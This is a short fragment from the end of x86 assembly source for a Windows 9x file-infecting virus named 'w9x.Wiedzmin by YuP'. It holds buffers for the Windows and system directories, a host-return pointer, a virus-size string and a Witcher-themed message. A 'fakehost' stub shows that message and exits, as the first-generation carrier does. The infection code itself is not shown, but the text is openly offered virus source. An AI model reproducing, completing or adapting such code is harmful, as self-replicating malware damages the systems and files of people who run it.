shitsize dd 0
oldDIR db 512 dup (?)
winDIR db 260 dup (?)
sysDIR db 260 dup (?)
winDIRr db 260 dup (?)
db 5 dup (?)
toHOST dd 0
; align dword
HeapEnd label byte
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy db "Elaine blath, Feainnewedd",0ah,0dh
db "Dearme aen a'caelme tedd",0ah,0dh
db "Eigean evelienn deireadh",0ah,0dh
db "Que'n esse, va en esseath",0ah,0dh
db "Feainnewedd, elaine blath!"
db 0ah,0dh
virussizee
db " bytes",0
fakehost:
push 0h
push offset titlee
push offset bodyy
push 0h
call MessageBoxA
push 0h
call ExitProcess
endshit: ends
End v_start